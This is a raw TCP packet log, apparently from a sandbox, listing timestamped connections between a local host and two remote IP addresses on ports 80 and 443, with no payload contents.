Oct 12, 2024 23:27:56.259181023 CEST	80	49750	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:56.259938955 CEST	80	49750	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:56.260004997 CEST	49750	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:56.260101080 CEST	49750	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:56.264904976 CEST	80	49750	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:56.549916029 CEST	49751	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:56.554954052 CEST	80	49751	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:56.555103064 CEST	49751	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:56.555217981 CEST	49751	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:56.555231094 CEST	49751	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:56.560062885 CEST	80	49751	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:56.560179949 CEST	80	49751	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:57.930603027 CEST	80	49751	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:57.931235075 CEST	80	49751	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:57.931307077 CEST	49751	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:57.931371927 CEST	49751	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:57.934503078 CEST	49752	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:57.936312914 CEST	80	49751	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:57.939450026 CEST	80	49752	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:57.939551115 CEST	49752	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:57.939685106 CEST	49752	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:57.939718008 CEST	49752	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:57.944571972 CEST	80	49752	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:57.944603920 CEST	80	49752	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:59.333549976 CEST	80	49752	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:59.334549904 CEST	80	49752	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:59.334639072 CEST	49752	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:59.351689100 CEST	49752	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:59.356620073 CEST	80	49752	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:59.389647007 CEST	49753	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:59.394634008 CEST	80	49753	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:59.394723892 CEST	49753	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:59.394874096 CEST	49753	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:59.394901991 CEST	49753	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:59.399710894 CEST	80	49753	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:59.399797916 CEST	80	49753	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:00.782381058 CEST	80	49753	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:00.783540964 CEST	80	49753	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:00.783631086 CEST	49753	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:00.783667088 CEST	49753	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:00.786437035 CEST	49760	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:00.788753033 CEST	80	49753	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:00.791480064 CEST	80	49760	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:00.791551113 CEST	49760	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:00.791733980 CEST	49760	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:00.791764021 CEST	49760	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:00.796610117 CEST	80	49760	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:00.796627045 CEST	80	49760	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:02.175883055 CEST	80	49760	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:02.177334070 CEST	80	49760	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:02.177397013 CEST	49760	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:02.177445889 CEST	49760	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:02.180179119 CEST	49772	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:02.182302952 CEST	80	49760	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:02.185051918 CEST	80	49772	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:02.185127974 CEST	49772	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:02.185267925 CEST	49772	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:02.185295105 CEST	49772	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:02.190025091 CEST	80	49772	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:02.190187931 CEST	80	49772	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:03.567646027 CEST	80	49772	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:03.568520069 CEST	80	49772	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:03.568584919 CEST	49772	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:03.568655968 CEST	49772	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:03.573405981 CEST	80	49772	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:03.573743105 CEST	49778	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:03.578588009 CEST	80	49778	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:03.578984976 CEST	49778	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:03.579154968 CEST	49778	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:03.579154968 CEST	49778	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:03.584017992 CEST	80	49778	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:03.584131956 CEST	80	49778	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:04.963047028 CEST	80	49778	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:04.965542078 CEST	80	49778	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:04.965663910 CEST	49778	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:04.965805054 CEST	49778	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:04.967921972 CEST	49789	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:04.970617056 CEST	80	49778	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:04.972898960 CEST	80	49789	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:04.972976923 CEST	49789	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:04.973149061 CEST	49789	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:04.973164082 CEST	49789	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:04.978065014 CEST	80	49789	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:04.978094101 CEST	80	49789	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:06.354466915 CEST	80	49789	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:06.355340958 CEST	80	49789	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:06.355448008 CEST	49789	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:06.378535032 CEST	49789	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:06.383922100 CEST	80	49789	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:06.384879112 CEST	49800	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:06.389805079 CEST	80	49800	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:06.389906883 CEST	49800	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:06.390017986 CEST	49800	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:06.390919924 CEST	49800	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:06.395179033 CEST	80	49800	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:06.395798922 CEST	80	49800	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:07.766947985 CEST	80	49800	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:07.767251968 CEST	80	49800	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:07.767337084 CEST	49800	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:07.767370939 CEST	49800	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:07.769596100 CEST	49811	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:07.772299051 CEST	80	49800	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:07.774597883 CEST	80	49811	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:07.774687052 CEST	49811	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:07.774807930 CEST	49811	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:07.774832010 CEST	49811	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:07.779773951 CEST	80	49811	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:07.779803991 CEST	80	49811	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:09.196805000 CEST	80	49811	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:09.198678017 CEST	80	49811	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:09.198761940 CEST	49811	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:09.198796988 CEST	49811	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:09.203680038 CEST	80	49811	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:09.347584009 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:09.347630024 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:09.347691059 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:09.347982883 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:09.347999096 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:09.991247892 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:09.991467953 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:09.992835045 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:09.992866039 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:09.993230104 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.000269890 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.047403097 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.214987993 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.215010881 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.215081930 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.215107918 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.269970894 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.307337999 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.307373047 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.307446003 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.308060884 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.308085918 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.308147907 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.308959961 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.308998108 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.309036016 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.309063911 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.309873104 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.309952974 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.400146008 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.400243998 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.400309086 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.400377035 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.401065111 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.401129007 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.401756048 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.401823997 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.402673006 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.402733088 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.403633118 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.403698921 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.469249010 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.469404936 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.493845940 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.493973017 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.494596004 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.494673967 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.494761944 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.494844913 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.495075941 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.495153904 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.495176077 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.495245934 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.496064901 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.496138096 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.496200085 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.496268034 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.496994019 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.497071028 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.497721910 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.497793913 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.497855902 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.497922897 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.498660088 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.498749018 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.562360048 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.562530041 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.587733030 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.587836981 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.587882042 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.587913990 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.587949991 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.587985039 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.588007927 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.588166952 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.588637114 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.588706017 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.588927984 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.589000940 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.589167118 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.589236975 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.589268923 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.589332104 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.589361906 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.589396954 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.589411020 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.589442015 CEST	49817	443	192.168.2.4	23.145.40.164
Oct 12, 2024 23:28:10.589452028 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.589474916 CEST	443	49817	23.145.40.164	192.168.2.4
Oct 12, 2024 23:28:10.777491093 CEST	49828	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:10.782397985 CEST	80	49828	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:10.782463074 CEST	49828	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:10.782593012 CEST	49828	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:10.782609940 CEST	49828	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:10.787612915 CEST	80	49828	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:10.787643909 CEST	80	49828	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:12.186402082 CEST	80	49828	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:12.186522961 CEST	80	49828	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:12.186614990 CEST	49828	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:12.186686993 CEST	49828	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:12.191865921 CEST	80	49828	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:12.192497015 CEST	49839	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:12.197499037 CEST	80	49839	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:12.197628021 CEST	49839	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:12.201994896 CEST	49839	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:12.202006102 CEST	49839	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:12.207319975 CEST	80	49839	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:12.207349062 CEST	80	49839	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:13.597269058 CEST	80	49839	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:13.598603010 CEST	80	49839	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:13.598656893 CEST	49839	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:13.598723888 CEST	49839	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:13.601202011 CEST	49848	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:13.604968071 CEST	80	49839	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:13.607023001 CEST	80	49848	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:13.607091904 CEST	49848	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:13.607196093 CEST	49848	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:13.607232094 CEST	49848	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:13.612198114 CEST	80	49848	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:13.612245083 CEST	80	49848	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:14.979952097 CEST	80	49848	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:14.980951071 CEST	80	49848	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:14.981041908 CEST	49848	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:14.981149912 CEST	49848	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:14.983609915 CEST	49856	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:14.986057997 CEST	80	49848	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:14.988570929 CEST	80	49856	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:14.988652945 CEST	49856	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:14.988976955 CEST	49856	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:14.989056110 CEST	49856	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:14.993782043 CEST	80	49856	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:14.993932962 CEST	80	49856	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:16.367022991 CEST	80	49856	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:16.368292093 CEST	80	49856	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:16.368431091 CEST	49856	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:16.368484974 CEST	49856	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:16.370928049 CEST	49862	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:16.373434067 CEST	80	49856	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:16.375916004 CEST	80	49862	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:16.376019001 CEST	49862	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:16.376106024 CEST	49862	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:16.376106024 CEST	49862	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:16.381119013 CEST	80	49862	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:16.381156921 CEST	80	49862	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:17.789314032 CEST	80	49862	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:17.790344954 CEST	80	49862	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:17.790438890 CEST	49862	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:17.790530920 CEST	49862	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:17.795299053 CEST	80	49862	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:17.804052114 CEST	49873	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:17.809021950 CEST	80	49873	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:17.809140921 CEST	49873	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:17.809283018 CEST	49873	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:17.809319973 CEST	49873	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:17.814182997 CEST	80	49873	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:17.814212084 CEST	80	49873	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:19.159792900 CEST	80	49873	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:19.160878897 CEST	80	49873	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:19.160968065 CEST	49873	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:19.161206961 CEST	49873	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:19.165072918 CEST	49882	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:19.166068077 CEST	80	49873	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:19.170093060 CEST	80	49882	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:19.170757055 CEST	49882	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:19.170994997 CEST	49882	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:19.170994997 CEST	49882	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:19.176059961 CEST	80	49882	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:19.176078081 CEST	80	49882	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:20.513290882 CEST	80	49882	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:20.514946938 CEST	80	49882	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:20.515029907 CEST	49882	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:20.515072107 CEST	49882	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:20.517689943 CEST	49890	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:20.520169973 CEST	80	49882	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:20.522902966 CEST	80	49890	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:20.523128033 CEST	49890	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:20.523128033 CEST	49890	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:20.523176908 CEST	49890	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:20.528624058 CEST	80	49890	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:20.528712034 CEST	80	49890	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:21.887073994 CEST	80	49890	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:21.888098001 CEST	80	49890	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:21.888189077 CEST	49890	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:21.888231039 CEST	49890	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:21.890633106 CEST	49901	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:21.893428087 CEST	80	49890	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:21.895559072 CEST	80	49901	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:21.895633936 CEST	49901	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:21.895740032 CEST	49901	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:21.895754099 CEST	49901	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:21.900665998 CEST	80	49901	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:21.900707960 CEST	80	49901	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:23.271878958 CEST	80	49901	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:23.273838997 CEST	80	49901	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:23.273941994 CEST	49901	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:23.273991108 CEST	49901	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:23.276237965 CEST	49908	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:23.279099941 CEST	80	49901	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:23.281066895 CEST	80	49908	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:23.281280994 CEST	49908	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:23.281369925 CEST	49908	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:23.281558990 CEST	49908	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:23.286236048 CEST	80	49908	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:23.286361933 CEST	80	49908	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:24.646559000 CEST	80	49908	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:24.646584988 CEST	80	49908	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:24.646828890 CEST	49908	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:24.646828890 CEST	49908	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:24.648978949 CEST	49918	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:24.651885033 CEST	80	49908	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:24.654030085 CEST	80	49918	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:24.654114008 CEST	49918	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:24.654222012 CEST	49918	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:24.654232979 CEST	49918	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:24.658984900 CEST	80	49918	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:24.659317970 CEST	80	49918	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:26.024338961 CEST	80	49918	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:26.025232077 CEST	80	49918	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:26.025285006 CEST	49918	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:26.025691032 CEST	49918	80	192.168.2.4	190.224.203.37
